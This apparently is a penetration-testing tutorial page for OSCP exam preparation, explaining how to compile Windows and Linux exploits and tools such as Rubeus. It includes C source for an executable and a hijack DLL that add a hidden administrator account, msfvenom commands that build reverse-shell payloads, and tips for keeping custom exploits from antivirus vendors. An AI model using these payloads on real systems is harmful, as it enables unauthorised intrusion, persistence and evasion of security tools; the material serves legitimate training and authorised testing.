> ## Documentation Index
> Fetch the complete documentation index at: https://hackwithmike.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Compiling Exploits

## Introduction

***

While compiling your own exploits could sound daunting, it is actually not as difficult as you may imagine. In fact, it is often easier than searching for hours for a pre-compiled binary that works.

Learning how to compile your own exploits has several advantages:

* **Availability**: Sometimes a pre-compiled binary just doesn't exist for the specific tool / exploit you need.
* **Reliability**: You can ensure the exploit targets the correct architecture (x64 vs x86) so it works on the target machine.
* **Safety**: You can verify the source code yourself, avoiding potentially malicious binaries (beginner hackers are prime targets!).

This guide will walk you through the simple steps to compile code for both Windows and Linux, as well as sharing some repositories of precompiled binaries for your convenience.

## Setting Up Our Environment

***

For OSCP (and beyond), we should ideally have a **Windows 10/11 Development Machine / VM** (separate from your Kali machine) to create and compile our Windows-specific exploits and binaries.

* It is possible to compile some Windows exploits on Kali Linux, but it's more likely to encounter dependency issues.
* Note that you may have to turn off Windows Defender, or set up exclusion paths for the project folders to avoid Defender quarantining the compiled binaries.

<Steps>
  <Step title="Windows Defender Settings">
    It is best that we keep **Real-time protection** enabled (to protect our system), but **Automatic sample submission** disabled (to avoid our custom exploits being submitted to AV vendors).

    <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/win_defender_1.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=be2f89a3600f3308aa238b044735439b" alt="Screenshot of Windows Defender exclusion paths" width="1256" height="1072" data-path="assets/images/oscp/win_defender_1.png" />
  </Step>

  <Step title="Finding Exclusion Settings">
    We can find the Exclusion settings by going to ***Windows Security*** > ***Virus & threat protection*** > ***Exclusions*** (Scroll to the bottom).

    <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/win_defender_2.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=d386cdb97ac669f05d9260cdb9a08b64" alt="Screenshot of Windows Defender exclusion settings" width="1256" height="978" data-path="assets/images/oscp/win_defender_2.png" />
  </Step>

  <Step title="Setting Exclusion Paths">
    And we can set exclusion paths for the project folders here:

    <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/win_defender_3.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=2d955048412eb43eaca84b09398c42cf" alt="Screenshot of Windows Defender exclusion details" width="1072" height="594" data-path="assets/images/oscp/win_defender_3.png" />
  </Step>
</Steps>

### Installing Visual Studio

Visual Studio is to be installed on our Windows Development Machine. We just need the **Visual Studio Community** version, which is free and enough for our usage.

<Steps>
  <Step title="Installing Visual Studio">
    Go to the [Visual Studio download page](https://visualstudio.microsoft.com/downloads/) and click on "***Free Download***" on the Community tab.

    * Note: Make sure you download ***Visual Studio***, NOT Visual Studio Code.

          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/download_vs.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=d8f5145aec4fdd0801c6637bbce198d1" alt="Screenshot of Visual Studio download page" width="1388" height="946" data-path="assets/images/oscp/download_vs.png" />
  </Step>

  <Step title="Choosing Workloads">
    During installation, you will be asked which "***Workloads***" to install. We generally only need these two:

    * `Desktop development with C++` (For kernel exploits, DLLs)
    * `.NET desktop development` (For C# tools like Rubeus/SharpUp)

          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/vs_workloads.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=6a5033377a6ef78b93b021713b056633" alt="Screenshot of Choosing Workloads" width="1552" height="1119" data-path="assets/images/oscp/vs_workloads.png" />
  </Step>

  <Step title="Finishing Installation">
    Let it download and install the required packages, it might take a while.

    * Once finished, click on ***Launch***, and choose "***Skip and add accounts later***".
    * We can then open existing `.sln` project files, or create a new project.
  </Step>
</Steps>

### Downloading the Code

We have to get the exploit codes onto our compiling machine.

##### On Kali Linux:

This will clone a repo to our current directory

```bash wrap theme={null}
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus
```

##### On Windows:

If you have Git installed on Windows:

```powershell wrap theme={null}
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus
```

##### Without using Git:

We can also just click the green "***Code***" button on GitHub and select "***Download ZIP***", then extract it.

<img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/download_repo.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=579bebd3237735b0601cab4b36c49137" alt="Screenshot of Downloading ZIP" width="1181" height="962" data-path="assets/images/oscp/download_repo.png" />

## Compiling Windows Exploits

***

Windows exploits typically come in two flavors: C# / .NET (e.g., [Rubeus](https://github.com/GhostPack/Rubeus), [Seatbelt](https://github.com/GhostPack/Seatbelt), [SharpUp](https://github.com/GhostPack/SharpUp), etc.), and Native C/C++ (e.g., [PrintSpoofer](https://github.com/itm4n/PrintSpoofer), [WerTrigger](https://github.com/sailay1996/WerTrigger), etc.).

### Visual Studio (C# / .NET)

Common Examples of C# based exploits: Rubeus, SharpUp, Seatbelt, and most Potato exploits.

<Steps>
  <Step title="Open the Project">
    Double-click the `.sln` (Solution) file to open the project file with Visual Studio.

    <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/sln.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=c71ce46736e37a05ad171f1784b24cb0" alt="Screenshot of Opening the Project file" width="999" height="687" data-path="assets/images/oscp/sln.png" />
  </Step>

  <Step title="Check .NET Version">
    You must compile for a version of .NET that is installed on the victim (e.g., Windows 7/2008 usually has .NET 3.5; Windows 10/2016+ has .NET 4.x).

    * Many well-known .NET tools were built on older framework versions. If your target is running modern Windows 10 / 11 systems (which is highly likely the case for OSCP), you can update to `.NET Framework 4.7.2` or higher.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/update_dotnet_framework.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=2e29a22f7dbee0ca60fb08d9e435c5b4" alt="Screenshot of the updating the Target Framework" width="718" height="415" data-path="assets/images/oscp/update_dotnet_framework.png" />

    - To change the Target Framework later, click on ***Project*** > ***Properties***.
    - Go to the ***Application*** tab.
    - Change (and Install if needed) the ***Target Framework*** to the version you need (e.g., `.NET Framework 4.5`).
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/change_dotnet_framework.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=b90dddb04efb3ac54e06ba60d7f8f071" alt="Screenshot of the Target Framework dropdown" width="1242" height="956" data-path="assets/images/oscp/change_dotnet_framework.png" />
  </Step>

  <Step title="Restore NuGet Packages (if needed)">
    Some C# tools use "NuGet" to manage dependencies (like external libraries). If you see yellow warning triangles in the Solution Explorer, Right-click the ***Solution*** > ***Restore NuGet Packages***.
  </Step>

  <Step title="Build">
    * Set configuration to ***Release*** and ***Any CPU*** (or x64/x86 specific if needed).
    * Go to ***Build*** > ***Build Solution***, or click on the "***Start***" button in the toolbar.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/release.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=922967696e4b1510fd4359d49d221426" alt="Screenshot of Building the Solution" width="794" height="253" data-path="assets/images/oscp/release.png" />

    - Upon successful compilation, the executable will automatically run, and it will be in the `<project_name>\bin\Release` folder.
      * Or in the `<project_name>\bin\x64\Release` folder if you selected x64.
            <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/cs_compile.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=d7e23a14c9eacb7a5e53a6bce7698e02" alt="Screenshot of Compiled Executable" width="1679" height="1160" data-path="assets/images/oscp/cs_compile.png" />
  </Step>
</Steps>

<br />

### Visual Studio (C/C++)

Visual Studio handles dependencies and project structures automatically for C/C++ projects.

<Steps>
  <Step title="Open the Project">
    Double-click the `.sln` (Solution) file to open the project file with Visual Studio.
  </Step>

  <Step title="Retarget Solution">
    If the project is old, you might see errors about missing SDKs.

    * Click on ***Retarget All***, and ***Apply*** to retarget to latest Windows SDK you have installed.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/retarget_solution.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=d0ad9ffb3719053d8393fdc6fb8682b9" alt="Screenshot of right-clicking Solution and selecting Retarget Solution" width="1708" height="1074" data-path="assets/images/oscp/retarget_solution.png" />
    * If you have ignored it previously, you can right-click the ***Solution*** in the "Solution Explorer" pane and select ***Retarget Solution***.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/retarget_solution_later.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=bd4d86d339316cb88ddac3558b828df5" alt="Screenshot of right-clicking Solution and selecting Retarget Solution later" width="993" height="539" data-path="assets/images/oscp/retarget_solution_later.png" />
  </Step>

  <Step title="Select Architecture">
    Look at the toolbar at the top.

    * Set the configuration to ***Release***.
    * Set the CPU to ***x64*** (for 64-bit targets) or ***x86*** (for 32-bit targets). This **must** match your victim machine.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/c_compile.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=9d49aa1f0600f8dd8049d5032ccfb9f5" alt="Screenshot of the toolbar with Release and x64 selected" width="993" height="207" data-path="assets/images/oscp/c_compile.png" />
  </Step>

  <Step title="Build">
    Press `Ctrl + Shift + B` or go to ***Build*** > ***Build Solution***.
    Check the Output window at the bottom to find where your `.exe` was saved.

    * It will be in the `<project_name>\x64Release` folder.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/c_compile2.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=dd4d0dcd5204aa4a0dcb76eb90ed4c97" alt="Screenshot of Build Output" width="1061" height="784" data-path="assets/images/oscp/c_compile2.png" />
  </Step>
</Steps>

### Cross-Compiling with MinGW on Linux

For simple C / C++ exploits, you can compile directly on Kali.

* Note that the `-lws2_32` flag is required to link the Windows Socket library for exploits that use network connections.
* The `-static` flag is commonly used to avoid linking issues with dynamic libraries. This makes the executable larger but more portable.

<Steps>
  <Step title="Install MinGW">
    To compile Windows executables on Kali using gcc, first install MinGW:

    ```bash wrap theme={null}
    sudo apt update && sudo apt install mingw-w64
    ```
  </Step>

  <Step title="Compile Your Exploit">
    We can then compile our exploit based on the target architecture.

    For C exploits, we use `gcc`:

    ```bash wrap theme={null}
    # Compile for 64-bit
    x86_64-w64-mingw32-gcc exploit.c -o exploit.exe -static

    # Compile for 32-bit
    i686-w64-mingw32-gcc exploit.c -o exploit.exe -static
    ```

    Whereas for C++ exploits, we use `g++`:

    ```bash wrap theme={null}
    # Compile for 64-bit
    x86_64-w64-mingw32-g++ exploit.cpp -o exploit.exe -static

    # Compile for 32-bit
    i686-w64-mingw32-g++ exploit.cpp -o exploit.exe -static
    ```
  </Step>
</Steps>

<br />

### Writing & Compiling Custom Exploits

***

In OSCP, you often need to create a simple "malicious" file to replace a legitimate binary (Service / Cronjob Replacement) or hijack a library (DLL Hijacking).

##### Simple EXE (Executable Replacement)

If you can replace a service binary / scheduled task binary, we can compile the following executable to add a user. You can replace the system commands with any other commands (in CMD) you need.

**`adduser.c`**

```c wrap theme={null}
// For x64 compile with: x86_64-w64-mingw32-gcc adduser.c -o adduser64.exe
// For x86 compile with: i686-w64-mingw32-gcc adduser.c -o adduser86.exe
#include <stdlib.h>

int main() {
    system("net user hacker Password123! /add");
    system("net localgroup administrators hacker /add");
    return 0;
}
```

##### Simple DLL (DLL Hijacking)

If you need to hijack a DLL, you need a specific structure (DllMain).

* Note that we will need the `-shared` flag for compiling DLLs.

`adduser_dll.c` for malicious DLL:

```c wrap theme={null}
// For x64 compile with: x86_64-w64-mingw32-gcc adduser_dll.c -shared -o adduser64.dll
// For x86 compile with: i686-w64-mingw32-gcc adduser_dll.c -shared -o adduser86.dll

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        system("cmd.exe /c net user hacker Password123! /add");
        system("cmd.exe /c net localgroup administrators hacker /add");
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

<br />

## Compiling Linux Exploits

***

While there could be compatibility issues, we usually compile Linux exploits on our Linux and transfer the compiled binary to the victim in the OSCP context. This is easier and doesn't rely on the victim having development tools (like `gcc`) installed.

### Compiling Locally (On Kali)

We typicall use `gcc` (for C) or `g++` (for C++) on Kali to build binaries for our Linux targets. Just make sure we match the architecture (32-bit vs 64-bit) of the target.

<Steps>
  <Step title="Check Victim Architecture">
    On the victim, run `uname -a`.

    * `x86_64` = 64-bit
    * `i686` or `i386` = 32-bit
  </Step>

  <Step title="Compile on Kali">
    **For 64-bit Targets:**
    Most exploits compile with a standard command. We can use the `-static` flag to ensure libraries (like libc) are bundled in, so it works even if the victim has different library versions, but note that this will significantly increases the file size.

    * We may also need the **`-pthread`** flag to link the POSIX thread library for threaded exploits (like DirtyCow variants).

    ```bash wrap theme={null}
    gcc exploit.c -o exploit -static
    ```

    **For 32-bit Targets:**
    If your Kali is 64-bit (which it likely is), you need to force a 32-bit build.

    ```bash wrap theme={null}
    # You might need to install 32-bit libraries first:
    # sudo apt install gcc-multilib

    gcc -m32 exploit.c -o exploit -static
    ```
  </Step>

  <Step title="Transfer">
    Upload the binary to the victim (e.g., using `wget` or `curl`).
  </Step>
</Steps>

### Compiling on the Victim

Sometimes, a kernel exploit is very sensitive to the specific kernel headers of the machine. If your cross-compiled binary returns the following error (or similar) - `Segmentation fault`, try compiling it directly on the victim if `gcc` is available.

<Steps>
  <Step title="Upload Exploit Source Code to Victim">
    Upload the `.c` source code to a user writable directory like `/tmp`.
  </Step>

  <Step title="Run the compile command locally">
    ```bash wrap theme={null}
    gcc exploit.c -o exploit
    ```
  </Step>
</Steps>

<br />

## Quick Wins: Msfvenom

***

Sometimes you just need a quick reverse shell or a binary that runs a specific command. We can use `msfvenom` to generate these instantly.

* These do not count as MetaSploit usage, as long as we are not using Meterpreter payloads.

##### Standard Windows Reverse Shell EXE:

```bash wrap theme={null}
msfvenom -p windows/x64/shell_reverse_tcp LHOST='<Attacker_IP>' LPORT=443 -f exe -o shell.exe
```

##### Standard Windows Reverse Shell DLL:

```bash wrap theme={null}
msfvenom -p windows/x64/shell_reverse_tcp LHOST='<Attacker_IP>' LPORT=443 -f dll -o shell.dll
```

##### Standard Linux Reverse Shell ELF Binary:

```bash wrap theme={null}
msfvenom -p linux/x64/shell_reverse_tcp LHOST= '<Attacker_IP>' LPORT=443 -f elf -o shell.elf
```

##### Run a Command on the Victim:

Once run, this will execute the command on a new shell instance.

* `/c` runs the command and then closes the shell, while `/k` keeps the shell open.

```bash wrap theme={null}
msfvenom -p windows/x64/exec CMD='cmd.exe /c whoami' -f exe -o test_command.exe
```

Technically you can do the same on Linux, but it's less useful since you can just run commands directly.

```bash wrap theme={null}
msfvenom -p linux/x64/exec CMD='whoami' -f elf -o test_command
```

<br />

## Precompiled Binaries

***

Here are some repositories for precompiled binaries. **Always exercise caution** - running any binaries from an untrusted source is a security risk. Ethical hackers are prime targets for actual malicious actors, since we are more likely to have reduced security measures when we are working with exploits.

* Note that I have not verified the authenticity of the binaries in these repositories, and I cannot guarantee their safety. Use at your own risk.

### Community Repositories

* **[jakobfriedl / precompiled-binaries](https://github.com/jakobfriedl/precompiled-binaries)**: A collection of useful pre-compiled .NET binaries or other executables for penetration testing Windows Active Directory environments.

### Outdated / Archived Repositories

* **[SecWiki / windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)**: A collection of precompiled Windows kernel exploits - most of them are for older kernels, and are likely irrelevant for OSCP.
* **[SecWiki / linux-kernel-exploits](https://github.com/SecWiki/linux-kernel-exploits)**: A collection of precompiled Linux kernel exploits - most of them are for older kernels, and are likely irrelevant for OSCP.

### My Repository

* To be added.
